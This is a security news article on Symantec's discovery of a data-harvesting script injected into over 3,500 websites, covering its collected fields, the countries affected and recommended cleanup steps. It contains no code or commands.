Malicious Script Infects 3,500 Servers Globally

A malicious script that has found its way to infect over 3,500 public servers globally is spewing potential malware attacks by redirecting victims to compromised websites.

Security firm Symantec has determined that a malicious script that has compromised over 3,500 public servers around the world is redirecting unsuspecting victims to compromised websites that may be used to download and spread malware.

The company’s Intrusion Prevention System signature detects hidden scripts injected in a compromised website that may redirect users to a website hosting malicious code. The trigger is alerted when a website hosting malicious code, compromised or otherwise, is accessed by a user. The security firm noted that all of the compromised websites used the same content management system.

Despite the worrying nature of the scale of the infection, there is no malware currently associated with the injection attack. The code does not redirect or lead to any malicious downloads either.

A significant majority of the malicious websites resided in the United States, at 47%. India followed at 12% before United Kingdom, Italy and Japan at 6% each.

The compromised websites were from a variety of organizations and included educational websites with the .edu domain, government websites and business websites.

The script collects information such as:

  • Page title
  • Referrer – enabling the attacker to ascertain the source from where the user came in
  • Shockwave Flash version
  • User language
  • Monitor resolution
  • Host IP address
  • URL page address displayed by the browser

An excerpt from Symantec’s blog explains how the malicious script carries out its operation:

Once a compromised page has loaded in the user’s browser, the malicious script waits 10 seconds and then runs remote JavaScript code, which in turn runs additional scripts. There are typically two to five additional scripts included as a chain to hide the infection from the victim.

As there is no signs of malware detected, the attacks are likely to be a reconnaissance operation to learn about targets and harvest information that could potentially be used in another attack. Future attacks contain the possibility of delivery of advertisements, SEO poisoning attacks and even cybercriminals modifying the code to target users with malware delivery.

The security firm recommends a complete sanitation of websites as a mitigation measure. Beyond changing the admin password, a full scan and checking the webserver’s files for backdoors are recommended.

Image credit: Wikimedia.